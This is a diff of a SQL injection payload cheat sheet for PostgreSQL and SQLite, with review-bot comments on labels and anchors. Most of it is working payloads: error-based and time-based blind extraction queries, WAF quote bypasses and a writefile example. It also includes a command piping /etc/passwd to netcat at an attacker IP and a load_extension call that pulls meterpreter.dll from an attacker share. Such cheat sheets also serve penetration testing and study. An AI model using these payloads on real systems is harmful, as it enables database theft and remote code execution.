CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
|
||||
CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)--
|
||||
CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)
|
||||
```
|
||||
|
||||
```sql
|
||||
@ -105,14 +94,14 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
### PostgreSQL XML Helpers
|
||||
|
||||
```sql
|
||||
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
|
||||
SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
|
||||
```
|
||||
|
||||
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
|
||||
|
||||
```sql
|
||||
select database_to_xml(true,true,''); -- dump the current database to XML
|
||||
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
|
||||
SELECT database_to_xml(true,true,''); -- dump the current database to XML
|
||||
SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
|
||||
```
|
||||
|
||||
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
|
||||
@ -166,6 +155,7 @@ select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end
|
||||
```
|
||||
|
||||
```sql
|
||||
AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
|
||||
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
||||
@ -276,9 +266,9 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||
```
|
||||
|
||||
|
||||
### PostgreSQL WAF Bypass
|
||||
## PostgreSQL WAF Bypass
|
||||
|
||||
#### Alternative to Quotes
|
||||
### Alternative to Quotes
|
||||
|
||||
| Payload | Technique |
|
||||
| ------------------ | --------- |
|
||||
@ -286,6 +276,24 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
|
||||
|
||||
|
||||
## PostgreSQL Privileges
|
||||
|
||||
### PostgreSQL List Privileges
|
||||
|
||||
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
|
||||
|
||||
```sql
|
||||
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
|
||||
```
|
||||
|
||||
### PostgreSQL Superuser Role
|
||||
|
||||
```sql
|
||||
SHOW is_superuser;
|
||||
SELECT current_setting('is_superuser');
|
||||
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
||||
|
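Review bot: In the new PostgreSQL Enumeration table the row `| Current User | SELECT usename FROM pg_user; |` is mislabelled: that query lists every role, and the same query already appears a few rows up as `List PostgreSQL Users`, so the duplicate row should be dropped or the label corrected. The other `Current User` rows (`user`, `current_user`, `session_user`, `getpgusername()`) are fine as moved from the removed `## PostgreSQL Current User` section. The Methodology table's `List Columns` row keeps the literal `data_table` while the adjacent rows use the `<SCHEMA_NAME>` placeholder style; `'<TABLE_NAME>'` would be consistent with the rest of this commit.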
@ -6,7 +6,7 @@
|
||||
## Summary
|
||||
|
||||
* [SQLite Comments](#sqlite-comments)
|
||||
* [SQLite Version](#sqlite-version)
|
||||
* [SQLite Enumeration](#sqlite-enumeration)
|
||||
* [SQLite String](#sqlite-string)
|
||||
* [SQLite String Methodology](#sqlite-string-methodology)
|
||||
* [SQLite Blind](#sqlite-blind)
|
||||
@ -17,22 +17,26 @@
|
||||
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
|
||||
* [Attach Database](#attach-database)
|
||||
* [Load_extension](#load_extension)
|
||||
* [SQLite File Manipulation](#SQLite-file-manipulation)
|
||||
* [SQLite Read File](#SQLite-read-file)
|
||||
* [SQLite Write File](#SQLite-write-file)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## SQLite Comments
|
||||
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `/* SQLite Comment */` | C-style comment |
|
||||
| `--` | SQL comment |
|
||||
| Description | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## SQLite Version
|
||||
## SQLite Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ------------- | ----------------------------------------- |
|
||||
| DBMS version | `select sqlite_version();` |
|
||||
|
||||
```sql
|
||||
select sqlite_version();
|
||||
```
|
||||
|
||||
## SQLite String
|
||||
|
||||
@ -42,9 +46,12 @@ select sqlite_version();
|
||||
| ----------------------- | ----------------------------------------- |
|
||||
| Extract Database Structure | `SELECT sql FROM sqlite_schema` |
|
||||
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
|
||||
| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
|
||||
| Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
|
||||
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
|
||||
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
|
||||
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
|
||||
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |
|
||||
|
||||
|
||||
## SQLite Blind
|
||||
@ -78,6 +85,7 @@ AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
||||
```
|
||||
|
||||
|
||||
@ -100,6 +108,19 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
|
||||
```
|
||||
|
||||
|
||||
## SQLite File Manipulation
|
||||
|
||||
### SQLite Read File
|
||||
|
||||
SQLite does not support file I/O operations by default.
|
||||
|
||||
|
||||
### SQLite Write File
|
||||
|
||||
```sql
|
||||
SELECT writefile('/path/to/file', column_name) FROM table_name
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
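Review bot: The version annotation in the new SQLite String Methodology rows is on the wrong line: `sqlite_schema` is the alias introduced in SQLite 3.33.0, while `sqlite_master` exists in every version, so the rows should read `| Extract Database Structure (sqlite_version >= 3.33.0) | SELECT sql FROM sqlite_schema |` and `| Extract Database Structure | SELECT sql FROM sqlite_master |`. The new `### SQLite Read File` text states that SQLite has no file I/O by default, but the `writefile()` used in `### SQLite Write File` is not a core function either — it comes from the fileio extension bundled with the sqlite3 shell — so the same caveat belongs on the write example. The new table-of-contents anchors `#SQLite-file-manipulation`, `#SQLite-read-file` and `#SQLite-write-file` are mixed-case, unlike every other anchor on the page (the Oracle file in this commit has the same `#OracleSQL-...` form); generated heading ids are lowercase, so lowercase anchors are the safer choice.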